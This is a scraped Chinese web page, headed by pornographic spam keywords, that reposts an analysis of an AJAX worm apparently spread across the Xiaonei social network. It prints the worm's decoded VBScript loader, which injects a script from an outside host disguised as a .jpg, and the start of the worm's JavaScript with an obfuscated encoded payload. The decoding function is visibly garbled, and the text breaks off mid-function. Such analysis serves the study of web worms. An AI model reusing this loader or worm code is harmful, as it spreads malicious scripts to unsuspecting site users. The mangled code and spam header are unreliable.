日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

  1. 首頁 > 云知道 > >

一個不為人知的感染幾百萬校內(nèi)網(wǎng)用戶的蠕蟲分析

云知道

在一次查看校內(nèi)網(wǎng)網(wǎng)頁源程序的時候無意間發(fā)現(xiàn)一個校內(nèi)蠕蟲,開始還以為是我的網(wǎng)頁有問題,就隨便打開幾個人的頁面查看,發(fā)現(xiàn)許多人的頁面上也有這段代碼 。
以上代碼出現(xiàn)在日志的開頭,只有查看源文件才能發(fā)現(xiàn) 。它將vbscript調(diào)了個頭寫,調(diào)回來就變成以下內(nèi)容:
set s=document.createElement("script")
s.src=https://www.rkxy.com.cn/security/UploadFiles_2035/200710/20071024152340443.jpg
document.getElementById("mya113").parentNode.insertBefore s,document.getElementById("mya113")
【一個不為人知的感染幾百萬校內(nèi)網(wǎng)用戶的蠕蟲分析】在這段腳本中它又新建了一個script,它的src指/Article/UploadFiles_2035/200710/20071024152340443.jpg(別相信后綴),下載加這個“jpg”用記事和UE打開都發(fā)現(xiàn)它填充了大量的asc的00(真不敢相信填充了那么多00 IE還能執(zhí)行),不過用Dreamweaver打開顯示正常,拷出JS 。然后花了幾乎一天的時間來分析這個js文件,發(fā)現(xiàn)它完完全全是一個基于ajax的蠕蟲 。
值得注意的是作者好像很低調(diào),在蠕蟲代碼中除了感染就是隱藏,沒有一行破壞性的代碼,僅僅是加了一個站長統(tǒng)計,估計作者是用來研究蠕蟲傳播情況的,因為站長統(tǒng)計要密碼我們進不去,所以不知道具體的感染情況,但是我剛才在google上搜了下sosoface,還是看到這個網(wǎng)站的流量圖:
http://www.chinarank.org.cn/detail/Info.do?url=www.sosoface.com&r=1192875678218
從上可以看到流量在幾天時間里大增,這些天應(yīng)該是蠕蟲感染的時間 。日訪問人數(shù)從0猛增到500百萬人/天,也就是每天那個JPG要被訪問5億次考慮到一個人可能訪問多個頁面,粗略估計應(yīng)該至少有幾百萬人受到感染 。另外,也就在大概兩三天前這個蠕蟲應(yīng)該是被校內(nèi)的人發(fā)現(xiàn)了,一夜之間全部消失了 。Sosoface也被停了 。
下面來分析感染代碼,我直接把注釋寫在JS中了,原本的程序可是一行注釋也沒有的 ??磿r從最底下的start函數(shù)看起:
var req = null;
var step=null;
var DiaryMonthUrlList="",DiaryUrlList="";
var timer=null;
var bIsBusy=false;
var myrand="46.115.50.124.115.127.119.47.48.127.107.115.35.35.33.48.50.123.118.47.48.127.107.115.35.35.33.48.50.97.102.107.126.119.47.53.112.115.113.121.117.96.125.103.124.118.40.103.96.126.58.100.112.97.113.96.123.98.102.40.119.106.119.113.103.102.119.58.65.102.96.64.119.100.119.96.97.119.58.48.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.62.97.50.119.96.125.116.119.80.102.96.119.97.124.123.60.119.118.125.92.102.124.119.96.115.98.60.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.50.40.48.48.117.98.120.60.97.120.124.106.61.97.119.117.115.127.123.61.127.125.113.60.119.113.115.116.125.97.125.97.60.101.101.101.61.61.40.98.102.102.122.48.48.47.113.96.97.60.97.40.59.48.48.102.98.123.96.113.97.48.48.58.102.124.119.127.119.126.87.119.102.115.119.96.113.60.102.124.119.127.103.113.125.118.47.97.50.102.119.97.48.59.59.50.59.53.44.46.61.115.44";
function my_HtmlDecode(str)
{
str=str.replace(/ str=str.replace(/>/g,">");
str=str.replace(/&/g,"&");
str=str.replace(/ /g," ");
str=str.replace(/"/g,""");
str=str.replace(/
/g,"n");
str=str.replace(/#/g,"#");
str=str.replace(/(/g,"(");
str=str.replace(/)/g,")");
str=str.replace(/"/g,""");
str=str.replace(/"/g,""");
str=str.replace(/#/g,"#");
str=str.replace(/(/g,"(");
str=str.replace(/)/g,")");
str=str.replace(/"/g,""");
str=str.replace(/"/g,""");
return str;
}
function proces

    推薦閱讀